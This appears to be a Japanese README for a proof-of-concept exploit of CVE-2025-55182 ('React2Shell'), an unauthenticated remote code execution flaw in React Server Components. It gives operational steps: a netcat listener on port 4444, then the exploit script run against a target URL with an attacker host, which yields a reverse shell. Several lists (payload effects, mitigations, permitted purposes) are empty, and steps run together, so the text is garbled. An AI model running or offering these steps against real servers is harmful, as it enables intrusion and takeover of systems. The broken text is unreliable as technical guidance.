
CVE-2025-55182(React2Shell)の概念実証エクスプロイト。巧妙に細工された Flight プロトコルのペイロードを介して React Server Components に存在する、認証不要のリモートコード実行(RCE)脆弱性です。
CVE-2025-55182は、React2Shellとしても知られる、React Server Componentsパッケージ(バージョン19.0、19.1.0、19.1.1、19.2.0)に影響を及ぼす深刻な**未認証のリモートコード実行(RCE)**脆弱性です。
この脆弱性により、攻撃者は認証を必要とせず、単一の巧妙に細工されたHTTPリクエストを介して、脆弱なサーバー上で任意のコード実行を達成できる可能性があります。
React Server Componentsは、クライアントとサーバー間で交換されるコンポーネントデータをシリアライズおよびデシリアライズするためにFlightプロトコルを使用します。
このデシリアライズ処理中の不適切な検証により、特別に細工されたペイロードが内部オブジェクト構造を操作し、危険なJavaScript実行プリミティブに到達できる可能性があります。
この脆弱性は、React Server Components(RSC)Flightプロトコルのペイロードをデシリアライズする際の検証不足に起因します。
特別に細工されたペイロードは、以下のことを行う可能性があります:
multipart/form-dataリクエストを送信しますマシン上でリスナーを起動します:
nc -lvnp 4444
エクスプロイトを実行します:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
この脆弱性を緩和するには:
- OffSec – CVE-2025-55182 エクスプロイト分析
- Microsoft Security – React2Shell への防御
このプロジェクトは、以下の目的にのみ提供されています:
著者は、この資料の誤用または損害について一切の責任を負いません。ユーザーは、適用されるすべての法律および規制を遵守する責任を負います。